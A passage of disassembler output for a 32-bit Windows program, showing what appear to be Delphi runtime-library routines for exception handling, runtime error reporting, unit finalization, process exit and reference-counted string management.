mov eax, 1
retn
sub_402BEC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402C40 proc near ; CODE XREF: sub_402E10+55�p
; sub_402E70+55�p ...
arg_2C = dword ptr 30h
call sub_403CD4
mov edx, [eax+0]
mov ecx, [edx]
mov [eax+0], ecx
mov eax, [edx+8]
call sub_40298C
pop edx
mov esp, [esp-4+arg_2C]
xor eax, eax
pop ecx
mov fs:[eax], ecx
pop eax
pop ebp
call sub_402A4C
jmp edx
sub_402C40 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_402C70 proc near ; CODE XREF: sub_401E98+F5�p
; sub_401E98+14A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor edx, edx
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
add ecx, 5
mov fs:[edx], eax
call ecx
retn 0Ch
sub_402C70 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
loc_402C88: ; CODE XREF: CODE:00402D88�j
; CODE:00402D94�j
push ebp
mov ebp, esp
mov edx, [ebp+8]
mov eax, [edx]
cmp eax, 0C0000092h
jg short loc_402CC3
jz short loc_402CF5
cmp eax, 0C000008Eh
jg short loc_402CB5
jz short loc_402CF9
sub eax, 0C0000005h
jz short loc_402D05
sub eax, 87h
jz short loc_402CED
dec eax
jz short loc_402D01
jmp short loc_402D15
; ---------------------------------------------------------------------------
loc_402CB5: ; CODE XREF: CODE:00402C9E�j
add eax, 3FFFFF71h
sub eax, 2
jb short loc_402CF5
jz short loc_402CF1
jmp short loc_402D15
; ---------------------------------------------------------------------------
loc_402CC3: ; CODE XREF: CODE:00402C95�j
cmp eax, 0C0000096h
jg short loc_402CDB
jz short loc_402D09
sub eax, 0C0000093h
jz short loc_402D01
dec eax
jz short loc_402CE9
dec eax
jz short loc_402CFD
jmp short loc_402D15
; ---------------------------------------------------------------------------
loc_402CDB: ; CODE XREF: CODE:00402CC8�j
sub eax, 0C00000FDh
jz short loc_402D11
sub eax, 3Dh
jz short loc_402D0D
jmp short loc_402D15
; ---------------------------------------------------------------------------
loc_402CE9: ; CODE XREF: CODE:00402CD4�j
mov al, 0C8h
jmp short loc_402D17
; ---------------------------------------------------------------------------
loc_402CED: ; CODE XREF: CODE:00402CAE�j
mov al, 0C9h
jmp short loc_402D17
; ---------------------------------------------------------------------------
loc_402CF1: ; CODE XREF: CODE:00402CBF�j
mov al, 0CDh
jmp short loc_402D17
; ---------------------------------------------------------------------------
loc_402CF5: ; CODE XREF: CODE:00402C97�j
; CODE:00402CBD�j
mov al, 0CFh
jmp short loc_402D17
; ---------------------------------------------------------------------------
loc_402CF9: ; CODE XREF: CODE:00402CA0�j
mov al, 0C8h
jmp short loc_402D17
; ---------------------------------------------------------------------------
loc_402CFD: ; CODE XREF: CODE:00402CD7�j
mov al, 0D7h
jmp short loc_402D17
; ---------------------------------------------------------------------------
loc_402D01: ; CODE XREF: CODE:00402CB1�j
; CODE:00402CD1�j
mov al, 0CEh
jmp short loc_402D17
; ---------------------------------------------------------------------------
loc_402D05: ; CODE XREF: CODE:00402CA7�j
mov al, 0D8h
jmp short loc_402D17
; ---------------------------------------------------------------------------
loc_402D09: ; CODE XREF: CODE:00402CCA�j
mov al, 0DAh
jmp short loc_402D17
; ---------------------------------------------------------------------------
loc_402D0D: ; CODE XREF: CODE:00402CE5�j
mov al, 0D9h
jmp short loc_402D17
; ---------------------------------------------------------------------------
loc_402D11: ; CODE XREF: CODE:00402CE0�j
mov al, 0CAh
jmp short loc_402D17
; ---------------------------------------------------------------------------
loc_402D15: ; CODE XREF: CODE:00402CB3�j
; CODE:00402CC1�j ...
mov al, 0FFh
loc_402D17: ; CODE XREF: CODE:00402CEB�j
; CODE:00402CEF�j ...
and eax, 0FFh
mov edx, [edx+0Ch]
call sub_4024FC
; ---------------------------------------------------------------------------
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_402D28: ; DATA XREF: sub_402DC8+D�o
mov eax, [esp+4]
test dword ptr [eax+4], 6
jnz loc_402DC2
cmp ds:byte_406018, 0
ja short loc_402D51
lea eax, [esp+4]
push eax
call sub_40102C ; UnhandledExceptionFilter
cmp eax, 0
jz short loc_402DC2
loc_402D51: ; CODE XREF: CODE:00402D40�j
mov eax, [esp+4]
cld
call sub_402980
mov edx, [esp+8]
push 0
push eax
push offset loc_402D6E
push edx
call ds:off_407014
loc_402D6E: ; DATA XREF: CODE:00402D62�o
mov ebx, [esp+4]
cmp dword ptr [ebx], 0EEDFADEh
mov edx, [ebx+14h]
mov eax, [ebx+18h]
jz short loc_402D9D
mov edx, ds:dword_40700C
test edx, edx
jz loc_402C88
mov eax, ebx
call edx ; dword_40700C
test eax, eax
jz loc_402C88
mov edx, [ebx+0Ch]
loc_402D9D: ; CODE XREF: CODE:00402D7E�j
call sub_402A68
mov ecx, ds:dword_407004
test ecx, ecx
jz short loc_402DAE
call ecx ; dword_407004
loc_402DAE: ; CODE XREF: CODE:00402DAA�j
mov ecx, [esp+4]
mov eax, 0D9h
mov edx, [ecx+14h]
mov [esp], edx
jmp sub_40310C
; ---------------------------------------------------------------------------
loc_402DC2: ; CODE XREF: CODE:00402D33�j
; CODE:00402D4F�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402DC8 proc near ; CODE XREF: sub_402ED0+2E�p
xor edx, edx
lea eax, [ebp-0Ch]
mov ecx, fs:[edx]
mov fs:[edx], eax
mov [eax], ecx
mov dword ptr [eax+4], offset loc_402D28
mov [eax+8], ebp
mov ds:dword_407624, eax
retn
sub_402DC8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402DE8 proc near ; CODE XREF: sub_403028:loc_4030B2�p
xor edx, edx
mov eax, ds:dword_407624
test eax, eax
jz short locret_402E0F
mov ecx, fs:[edx]
cmp eax, ecx
jnz short loc_402E02
mov eax, [eax]
mov fs:[edx], eax
retn
; ---------------------------------------------------------------------------
loc_402E00: ; CODE XREF: sub_402DE8+21�j
mov ecx, [ecx]
loc_402E02: ; CODE XREF: sub_402DE8+10�j
cmp ecx, 0FFFFFFFFh
jz short locret_402E0F
cmp [ecx], eax
jnz short loc_402E00
mov eax, [eax]
mov [ecx], eax
locret_402E0F: ; CODE XREF: sub_402DE8+9�j
; sub_402DE8+1D�j
retn
sub_402DE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E10 proc near ; CODE XREF: sub_402E10+4B�p
; sub_402E70+4B�p ...
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00402A88 SIZE 00000104 BYTES
; FUNCTION CHUNK AT 00402BAC SIZE 00000006 BYTES
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, offset dword_407620
mov eax, [edi+8]
test eax, eax
jz short loc_402E6A
mov ebx, [edi+0Ch]
mov esi, [eax+4]
xor edx, edx
push ebp
push offset loc_402E56
push dword ptr fs:[edx]
mov fs:[edx], esp
test ebx, ebx
jle short loc_402E4C
loc_402E3A: ; CODE XREF: sub_402E10+3A�j
dec ebx
mov [edi+0Ch], ebx
mov eax, [esi+ebx*8+4]
test eax, eax
jz short loc_402E48
call eax
loc_402E48: ; CODE XREF: sub_402E10+34�j
test ebx, ebx
jg short loc_402E3A
loc_402E4C: ; CODE XREF: sub_402E10+28�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_402E6A
; ---------------------------------------------------------------------------
loc_402E56: ; DATA XREF: sub_402E10+1B�o
jmp loc_402A88
; ---------------------------------------------------------------------------
call sub_402E10
call sub_402BEC
call sub_402C40
loc_402E6A: ; CODE XREF: sub_402E10+10�j
; sub_402E10+44�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_402E10 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E70 proc near ; CODE XREF: sub_402ED0+3A�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, ds:off_407628
test eax, eax
jz short loc_402ECA
mov esi, [eax]
xor ebx, ebx
mov edi, [eax+4]
xor edx, edx
push ebp
push offset loc_402EB6
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp esi, ebx
jle short loc_402EAC
loc_402E98: ; CODE XREF: sub_402E70+3A�j
mov eax, [edi+ebx*8]
inc ebx
mov ds:dword_40762C, ebx
test eax, eax
jz short loc_402EA8
call eax
loc_402EA8: ; CODE XREF: sub_402E70+34�j
cmp esi, ebx
jg short loc_402E98
loc_402EAC: ; CODE XREF: sub_402E70+26�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_402ECA
; ---------------------------------------------------------------------------
loc_402EB6: ; DATA XREF: sub_402E70+19�o
jmp loc_402A88
; ---------------------------------------------------------------------------
call sub_402E10
call sub_402BEC
call sub_402C40
loc_402ECA: ; CODE XREF: sub_402E70+D�j
; sub_402E70+44�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_402E70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402ED0 proc near ; CODE XREF: sub_403D20+3A�p
mov ds:off_407010, offset sub_40101C
mov ds:off_407014, offset sub_401024
mov ds:off_407628, eax
xor eax, eax
mov ds:dword_40762C, eax
mov ds:off_407630, edx
mov eax, [edx+4]
mov ds:dword_40701C, eax
call sub_402DC8
mov ds:byte_407024, 0
call sub_402E70
retn
sub_402ED0 endp
; =============== S U B R O U T I N E =======================================
sub_402F10 proc near ; CODE XREF: sub_403028+38�p
push ebx
push esi
push edi
mov esi, offset aRuntimeErrorAt ; "Runtime error at 00000000"
mov cl, 10h
mov ebx, ds:dword_406000
loc_402F20: ; CODE XREF: sub_402F10+33�j
mov eax, ebx
mov edi, 0Ah
cdq
idiv edi
add dl, 30h
xor eax, eax
mov al, cl
mov [esi+eax], dl
mov eax, ebx
mov ebx, 0Ah
cdq
idiv ebx
mov ebx, eax
dec ecx
test ebx, ebx
jnz short loc_402F20
mov cl, 1Ch
mov eax, ds:dword_406004
loc_402F4C: ; CODE XREF: sub_402F10+54�j
mov edx, eax
and edx, 0Fh
mov dl, ds:byte_40607C[edx]
xor ebx, ebx
mov bl, cl
mov [esi+ebx], dl
shr eax, 4
dec ecx
test eax, eax
jnz short loc_402F4C
pop edi
pop esi
pop ebx
retn
sub_402F10 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402F6C proc near ; CODE XREF: sub_403028+9E�p
xor eax, eax
xchg eax, ds:dword_406000
neg eax
sbb eax, eax
inc eax
mov edi, offset dword_407620
mov ebx, [edi+18h]
mov ebp, [edi+14h]
push dword ptr [edi+1Ch]
push dword ptr [edi+20h]
mov esi, [edi]
mov ecx, 0Bh
rep movsd
pop edi
pop esi
leave
retn 0Ch
sub_402F6C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402F9C proc near ; CODE XREF: sub_403028+3D�p
var_4 = byte ptr -4
push ecx
cmp ds:byte_407034, 0
jz short loc_402FFD
cmp ds:word_407208, 0D7B2h
jnz short loc_402FC5
cmp ds:dword_407210, 0
jbe short loc_402FC5
mov eax, offset dword_407204
call ds:dword_407220
loc_402FC5: ; CODE XREF: sub_402F9C+13�j
; sub_402F9C+1C�j
push 0
lea eax, [esp+8+var_4]
push eax
push 1Eh
push offset aRuntimeErrorAt ; "Runtime error at 00000000"
push 0FFFFFFF5h
call sub_401014 ; GetStdHandle
push eax
call sub_401034 ; WriteFile
push 0
lea eax, [esp+8+var_4]
push eax
push 2
push offset dword_403024
push 0FFFFFFF5h
call sub_401014 ; GetStdHandle
push eax
call sub_401034 ; WriteFile
pop edx
retn
; ---------------------------------------------------------------------------
loc_402FFD: ; CODE XREF: sub_402F9C+8�j
cmp ds:byte_406020, 0
jnz short loc_403019
push 0
push offset aError ; "Error"
push offset aRuntimeErrorAt ; "Runtime error at 00000000"
push 0
call sub_40104C ; MessageBoxA
loc_403019: ; CODE XREF: sub_402F9C+68�j
pop edx
retn
sub_402F9C endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 2
dword_403024 dd 0A0Dh
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_403028 proc near ; CODE XREF: sub_403100+5�p
; CODE:00405B37�p
push ebx
push esi
push edi
push ebp
mov ebx, offset dword_407620
mov esi, offset dword_406000
mov edi, offset dword_407030
cmp byte ptr [ebx+28h], 0
jnz short loc_403057
cmp dword ptr [edi], 0
jz short loc_403057
loc_403046: ; CODE XREF: sub_403028+2D�j
mov edx, [edi]
mov eax, edx
xor edx, edx
mov [edi], edx
mov ebp, eax
call ebp
cmp dword ptr [edi], 0
jnz short loc_403046
loc_403057: ; CODE XREF: sub_403028+17�j
; sub_403028+1C�j
cmp ds:dword_406004, 0
jz short loc_403071
call sub_402F10
call sub_402F9C
xor eax, eax
mov ds:dword_406004, eax
loc_403071: ; CODE XREF: sub_403028+36�j
; sub_403028+CE�j
cmp byte ptr [ebx+28h], 2
jnz short loc_403081
cmp dword ptr [esi], 0
jnz short loc_403081
xor eax, eax
mov [ebx+0Ch], eax
loc_403081: ; CODE XREF: sub_403028+4D�j
; sub_403028+52�j
call sub_402E10
cmp byte ptr [ebx+28h], 1
jbe short loc_403091
cmp dword ptr [esi], 0
jz short loc_4030B2
loc_403091: ; CODE XREF: sub_403028+62�j
mov eax, [ebx+10h]
test eax, eax
jz short loc_4030B2
call sub_403A0C
mov edx, [ebx+10h]
mov eax, [edx+10h]
cmp eax, [edx+4]
jz short loc_4030B2
test eax, eax
jz short loc_4030B2
push eax
call sub_401054 ; FreeLibrary
loc_4030B2: ; CODE XREF: sub_403028+67�j
; sub_403028+6E�j ...
call sub_402DE8
cmp byte ptr [ebx+28h], 1
jnz short loc_4030C0
call dword ptr [ebx+24h]
loc_4030C0: ; CODE XREF: sub_403028+93�j
cmp byte ptr [ebx+28h], 0
jz short loc_4030CB
call sub_402F6C
loc_4030CB: ; CODE XREF: sub_403028+9C�j
cmp dword ptr [ebx], 0
jnz short loc_4030E7
cmp ds:dword_407018, 0
jz short loc_4030DF
call ds:dword_407018
loc_4030DF: ; CODE XREF: sub_403028+AF�j
mov eax, [esi]
push eax
call sub_401044 ; ExitProcess
loc_4030E7: ; CODE XREF: sub_403028+A6�j
mov eax, [ebx]
push esi
mov esi, eax
mov edi, ebx
mov ecx, 0Bh
rep movsd
pop esi
jmp loc_403071
sub_403028 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop ebp
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_403100 proc near ; CODE XREF: sub_4024FC+6�p
; sub_40310C+6�j
mov ds:dword_406000, eax
call sub_403028
sub_403100 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40310C proc near ; CODE XREF: CODE:00402DBD�j
; sub_403C90+1A�p ...
pop ds:dword_406004
jmp sub_403100
sub_40310C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_403118 proc near ; CODE XREF: sub_40269C+F�p
; sub_403208+23�p ...
mov edx, [eax]
test edx, edx
jz short locret_40313A
mov dword ptr [eax], 0
mov ecx, [edx-8]
dec ecx
jl short locret_40313A
lock dec dword ptr [edx-8]
jnz short locret_40313A
push eax
lea eax, [edx-8]
call sub_40248C
pop eax
locret_40313A: ; CODE XREF: sub_403118+4�j
; sub_403118+10�j ...
retn
sub_403118 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40313C proc near ; CODE XREF: sub_403468+56�p
; sub_403F04+266�p ...
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_403142: ; CODE XREF: sub_40313C+2A�j
mov edx, [ebx]
test edx, edx
jz short loc_403162
mov dword ptr [ebx], 0
mov ecx, [edx-8]
dec ecx
jl short loc_403162
lock dec dword ptr [edx-8]
jnz short loc_403162
lea eax, [edx-8]
call sub_40248C
loc_403162: ; CODE XREF: sub_40313C+A�j
; sub_40313C+16�j ...
add ebx, 4
dec esi
jnz short loc_403142
pop esi
pop ebx
retn
sub_40313C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40316C proc near ; CODE XREF: sub_4032A4+8�j
; sub_40356C+70�p ...
test edx, edx
jz short loc_403194
mov ecx, [edx-8]
inc ecx
jg short loc_403190
push eax
push edx
mov eax, [edx-4]
call sub_4031DC
mov edx, eax
pop eax
push edx
mov ecx, [eax-4]
call sub_402570
pop edx
pop eax
jmp short loc_403194
; ---------------------------------------------------------------------------
loc_403190: ; CODE XREF: sub_40316C+8�j
lock inc dword ptr [edx-8]
loc_403194: ; CODE XREF: sub_40316C+2�j
; sub_40316C+22�j
xchg edx, [eax]
test edx, edx
jz short locret_4031AE
mov ecx, [edx-8]
dec ecx
jl short locret_4031AE
lock dec dword ptr [edx-8]
jnz short locret_4031AE
lea eax, [edx-8]
call sub_40248C
locret_4031AE: ; CODE XREF: sub_40316C+2C�j
; sub_40316C+32�j ...
retn
sub_40316C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4031B0 proc near ; CODE XREF: sub_405018+38�p
test edx, edx
jz short loc_4031BE
mov ecx, [edx-8]
inc ecx
jle short loc_4031BE
lock inc dword ptr [edx-8]
loc_4031BE: ; CODE XREF: sub_4031B0+2�j
; sub_4031B0+8�j
xchg edx, [eax]
test edx, edx
jz short locret_4031D8
mov ecx, [edx-8]
dec ecx
jl short locret_4031D8
lock dec dword ptr [edx-8]
jnz short locret_4031D8
lea eax, [edx-8]
call sub_40248C
locret_4031D8: ; CODE XREF: sub_4031B0+12�j
; sub_4031B0+18�j ...
retn
sub_4031B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4031DC proc near ; CODE XREF: sub_40316C+F�p
; sub_403208+B�p ...
test eax, eax
jle short loc_403204
push eax
add eax, 0Ah
and eax, 0FFFFFFFEh
push eax
call sub_40246C
pop edx
mov word ptr [edx+eax-2], 0
add eax, 8
pop edx
mov [eax-4], edx
mov dword ptr [eax-8], 1
retn
; ---------------------------------------------------------------------------
loc_403204: ; CODE XREF: sub_4031DC+2�j
xor eax, eax
retn
sub_4031DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403208 proc near ; CODE XREF: sub_40269C+2F�p
; sub_403238+8�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
mov eax, edi
call sub_4031DC
mov ecx, edi
mov edi, eax
test esi, esi
jz short loc_403229
mov edx, eax
mov eax, esi
call sub_402570
loc_403229: ; CODE XREF: sub_403208+16�j
mov eax, ebx
call sub_403118
mov [ebx], edi
pop edi
pop esi
pop ebx
retn
sub_403208 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403238 proc near ; CODE XREF: sub_404180+42�p
; sub_404F94+45�p
push edx
mov edx, esp
mov ecx, 1
call sub_403208
pop edx
retn
sub_403238 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403248 proc near ; CODE XREF: sub_405018+49�p
; CODE:00405AA1�p
xor ecx, ecx
test edx, edx
jz short loc_40326F
push edx
loc_40324F: ; CODE XREF: sub_403248+1D�j
cmp cl, [edx]
jz short loc_40326A
cmp cl, [edx+1]
jz short loc_403269
cmp cl, [edx+2]
jz short loc_403268
cmp cl, [edx+3]
jz short loc_403267
add edx, 4
jmp short loc_40324F
; ---------------------------------------------------------------------------
loc_403267: ; CODE XREF: sub_403248+18�j
inc edx
loc_403268: ; CODE XREF: sub_403248+13�j
inc edx
loc_403269: ; CODE XREF: sub_403248+E�j
inc edx
loc_40326A: ; CODE XREF: sub_403248+9�j
mov ecx, edx
pop edx
sub ecx, edx
loc_40326F: ; CODE XREF: sub_403248+4�j
jmp sub_403208
sub_403248 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403278 proc near ; CODE XREF: sub_404254+22C�p
; sub_40448C+19C�p ...
xor ecx, ecx
mov cl, [edx]
inc edx
jmp sub_403208
sub_403278 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403284 proc near ; CODE XREF: sub_403AC0+36�p
push edi
push eax
push ecx
mov edi, edx
xor eax, eax
repne scasb
jnz short loc_403291
not ecx
loc_403291: ; CODE XREF: sub_403284+9�j
pop eax
add ecx, eax
pop eax
pop edi
jmp sub_403208
sub_403284 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40329C proc near ; CODE XREF: sub_403F04+3E�p
; sub_403F04+4E�p ...
test eax, eax
jz short locret_4032A3
mov eax, [eax-4]
locret_4032A3: ; CODE XREF: sub_40329C+2�j
retn
sub_40329C endp
; =============== S U B R O U T I N E =======================================
sub_4032A4 proc near ; CODE XREF: sub_404180+50�p
; sub_404F94+4F�p
test edx, edx
jz short locret_4032E7
mov ecx, [eax]
test ecx, ecx
jz sub_40316C
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, [ecx-4]
mov edx, [esi-4]
add edx, edi
cmp esi, ecx
jz short loc_4032DC
call sub_403350
mov eax, esi
mov ecx, [esi-4]
loc_4032CF: ; CODE XREF: sub_4032A4+41�j
mov edx, [ebx]
add edx, edi
call sub_402570
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4032DC: ; CODE XREF: sub_4032A4+1F�j
call sub_403350
mov eax, [ebx]
mov ecx, edi
jmp short loc_4032CF
; ---------------------------------------------------------------------------
locret_4032E7: ; CODE XREF: sub_4032A4+2�j
retn
sub_4032A4 endp
; =============== S U B R O U T I N E =======================================
sub_4032E8 proc near ; CODE XREF: sub_403F04+20�p
; sub_403F04+28�p ...
test eax, eax
jz short locret_4032F6
mov edx, [eax-8]
inc edx
jle short locret_4032F6
lock inc dword ptr [eax-8]
locret_4032F6: ; CODE XREF: sub_4032E8+2�j
; sub_4032E8+8�j
retn
sub_4032E8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4032F8 proc near ; CODE XREF: sub_4046BC+2A�p
; sub_4046BC+42�p ...
test eax, eax
jz short loc_4032FE
retn
; ---------------------------------------------------------------------------
byte_4032FD db 0 ; DATA XREF: sub_4032F8:loc_4032FE�o
; ---------------------------------------------------------------------------
loc_4032FE: ; CODE XREF: sub_4032F8+2�j
mov eax, offset byte_4032FD
retn
sub_4032F8 endp
; =============== S U B R O U T I N E =======================================
sub_403304 proc near ; CODE XREF: sub_403348�j
mov edx, [eax]
test edx, edx
jz short loc_403342
mov ecx, [edx-8]
dec ecx
jz short loc_403342
push ebx
mov ebx, eax
mov eax, [edx-4]
call sub_4031DC
mov edx, eax
mov eax, [ebx]
mov [ebx], edx
push eax
mov ecx, [eax-4]
call sub_402570
pop eax
mov ecx, [eax-8]
dec ecx
jl short loc_40333F
lock dec dword ptr [eax-8]
jnz short loc_40333F
lea eax, [eax-8]
call sub_40248C
loc_40333F: ; CODE XREF: sub_403304+2B�j
; sub_403304+31�j
mov edx, [ebx]
pop ebx
loc_403342: ; CODE XREF: sub_403304+4�j
; sub_403304+A�j
mov eax, edx
retn
sub_403304 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403348 proc near ; CODE XREF: sub_403F04+88�p
; sub_403F04+C9�p ...
jmp sub_403304
sub_403348 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403350 proc near ; CODE XREF: sub_4025B0+7F�p
; sub_4032A4+21�p ...
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
xor edi, edi
test edx, edx
jle short loc_4033A5
mov eax, [ebx]
test eax, eax
jz short loc_403386
cmp dword ptr [eax-8], 1
jnz short loc_403386
sub eax, 8
add edx, 9
push eax
mov eax, esp
call sub_4024AC
pop eax
add eax, 8
mov [ebx], eax
mov [eax-4], esi
mov byte ptr [esi+eax], 0
jmp short loc_4033AE
; ---------------------------------------------------------------------------
loc_403386: ; CODE XREF: sub_403350+11�j
; sub_403350+17�j
mov eax, edx
call sub_4031DC
mov edi, eax
mov eax, [ebx]
test eax, eax
jz short loc_4033A5
mov edx, edi
mov ecx, [eax-4]
cmp ecx, esi
jl short loc_4033A0
mov ecx, esi
loc_4033A0: ; CODE XREF: sub_403350+4C�j
call sub_402570
loc_4033A5: ; CODE XREF: sub_403350+B�j
; sub_403350+43�j
mov eax, ebx
call sub_403118
mov [ebx], edi
loc_4033AE: ; CODE XREF: sub_403350+34�j
pop edi
pop esi
pop ebx
retn
sub_403350 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_4033F8
loc_4033B4: ; CODE XREF: sub_4033F8+1D�j
mov al, 1
jmp sub_402554
; END OF FUNCTION CHUNK FOR sub_4033F8
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4033BC proc near ; CODE XREF: sub_4033F8+2�j
; sub_4033F8+D�j ...
mov edx, [eax]
test edx, edx
jz short locret_4033D0
mov dword ptr [eax], 0
push eax
push edx
call sub_4010A4
pop eax
locret_4033D0: ; CODE XREF: sub_4033BC+4�j
retn
sub_4033BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4033D4 proc near ; CODE XREF: sub_403468+70�p
push ebx
push esi
mov ebx, eax
mov esi, edx
loc_4033DA: ; CODE XREF: sub_4033D4+1C�j
mov eax, [ebx]
test eax, eax
jz short loc_4033EC
mov dword ptr [ebx], 0
push eax
call sub_4010A4
loc_4033EC: ; CODE XREF: sub_4033D4+A�j
add ebx, 4
dec esi
jnz short loc_4033DA
pop esi
pop ebx
retn
sub_4033D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4033F8 proc near ; CODE XREF: sub_40356C+81�p
; sub_403688+61�p
; FUNCTION CHUNK AT 004033B4 SIZE 00000007 BYTES
test edx, edx
jz sub_4033BC
mov ecx, [edx-4]
shr ecx, 1
jz sub_4033BC
push ecx
push edx
push eax
call sub_40109C
test eax, eax
jz loc_4033B4
retn
sub_4033F8 endp
; =============== S U B R O U T I N E =======================================
sub_40341C proc near ; CODE XREF: sub_403468+AF�p
xor ecx, ecx
push ebx
mov cl, [edx+1]
push esi
push edi
mov ebx, eax
lea esi, [ecx+edx+0Ah]
mov edi, [ecx+edx+6]
loc_40342E: ; CODE XREF: sub_40341C+29�j
mov edx, [esi]
mov eax, [esi+4]
add eax, ebx
mov edx, [edx]
mov ecx, 1
call sub_403468
add esi, 8
dec edi
jg short loc_40342E
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_40341C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403450 proc near ; CODE XREF: sub_403468+7C�p
cmp ds:dword_40600C, 0
jz short loc_403460
call ds:dword_40600C
retn
; ---------------------------------------------------------------------------
loc_403460: ; CODE XREF: sub_403450+7�j
mov al, 10h
call sub_402554
sub_403450 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_403468 proc near ; CODE XREF: sub_40341C+20�p
; sub_403468+99�p ...
cmp ecx, 0
jz locret_403551
push eax
push ebx
push esi
push edi
mov ebx, eax
mov esi, edx
mov edi, ecx
xor edx, edx
mov al, [esi]
mov dl, [esi+1]
cmp al, 0Ah
jz short loc_4034AB
cmp al, 0Bh
jz short loc_4034C8
cmp al, 0Ch
jz short loc_4034DF
cmp al, 0Dh
jz short loc_4034EE
cmp al, 0Eh
jz short loc_40350C
cmp al, 0Fh
jz loc_403522
cmp al, 11h
jz loc_403531
jmp loc_403542
; ---------------------------------------------------------------------------
loc_4034AB: ; CODE XREF: sub_403468+1C�j
cmp ecx, 1
mov eax, ebx
jg short loc_4034BC
call sub_403118
jmp loc_40354D
; ---------------------------------------------------------------------------
loc_4034BC: ; CODE XREF: sub_403468+48�j
mov edx, ecx
call sub_40313C
jmp loc_40354D
; ---------------------------------------------------------------------------
loc_4034C8: ; CODE XREF: sub_403468+20�j
cmp ecx, 1
mov eax, ebx
jg short loc_4034D6
call sub_4033BC
jmp short loc_40354D
; ---------------------------------------------------------------------------
loc_4034D6: ; CODE XREF: sub_403468+65�j
mov edx, ecx
call sub_4033D4
jmp short loc_40354D
; ---------------------------------------------------------------------------
loc_4034DF: ; CODE XREF: sub_403468+24�j
; sub_403468+82�j
mov eax, ebx
add ebx, 10h
call sub_403450
dec edi
jg short loc_4034DF
jmp short loc_40354D
; ---------------------------------------------------------------------------
loc_4034EE: ; CODE XREF: sub_403468+28�j
push ebp
mov ebp, edx
loc_4034F1: ; CODE XREF: sub_403468+9F�j
mov edx, [esi+ebp+0Ah]
mov eax, ebx
add ebx, [esi+ebp+2]
mov ecx, [esi+ebp+6]
mov edx, [edx]
call sub_403468
dec edi
jg short loc_4034F1
pop ebp
jmp short loc_40354D
; ---------------------------------------------------------------------------
loc_40350C: ; CODE XREF: sub_403468+2C�j
push ebp
mov ebp, edx
loc_40350F: ; CODE XREF: sub_403468+B5�j
